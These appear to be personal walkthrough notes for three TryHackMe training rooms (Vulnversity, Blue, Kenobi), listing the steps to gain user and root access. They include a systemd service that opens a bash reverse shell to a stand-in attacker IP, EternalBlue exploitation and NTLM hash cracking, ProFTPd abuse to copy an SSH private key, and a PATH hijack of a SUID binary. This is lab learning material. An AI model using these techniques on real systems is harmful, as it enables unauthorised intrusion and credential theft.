###########
Tryhackme #
###########

--------------------------
1. tryhackme - Vulnversity
user: php reverse shell, uploaded to [ip]/internal/
root: /bin/systemctl SUID priv esc. Upload, enable and start custom service: https://gist.github.com/A1vinSmith/78786df7899a840ec43c5ddecb6a4740

root.service: 
  [Unit]
Description=roooooooooot

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/KaliIP/9999 0>&1'

[Install]
WantedBy=multi-user.target

-------------------
2. tryhackme - Blue
user: none. After eternalblue, cracked user password hash through "hashdump" in meterpreter: 
john --format=NT --rules -w=/usr/share/wordlists/rockyou.txt hash.txt
hash.txt only has NTLM hash in it (the 4th part NTLM hashes) 

root: metasploit -> exploit/windows/smb/ms17_010_eternalblue. 

---------------------
3. tryhackme - Kenobi
Goal: Accessing Samba share, manipulating a vulnerable version of proftpd to gain initial access and escalate privileges to root via an SUID binary.
Enumeration: 
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.34.26
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.34.26

User: 
nc 10.10.34.26 21                   #ProFTPd 1.3.5 vuln
SITE CPFR /home/kenobi/.ssh/id_rsa  #copy known ssh key location from smbget -R smb://10.10.34.26/anonymous login
SITE CPTO /var/tmp/id_rsa

mount 10.10.34.26:/var /mnt/kenobiNFS #mount share
cp /mnt/kenobiNFS/tmp/id_rsa .        #copy ssh key
ssh -i id_rsa kenobi@10.10.34.26      #ssh with key

Root:
find / -perm -u=s -type f 2>/dev/null #SUID search
/usr/bin/menu                         #looks custom
strings /usr/bin/menu                 #commands are run relative

cd /tmp
echo /bin/sh > curl
chmod 777 curl
export PATH=/tmp:$PATH
/usr/bin/menu (select the menu option that runs "curl" as root)
root shell#





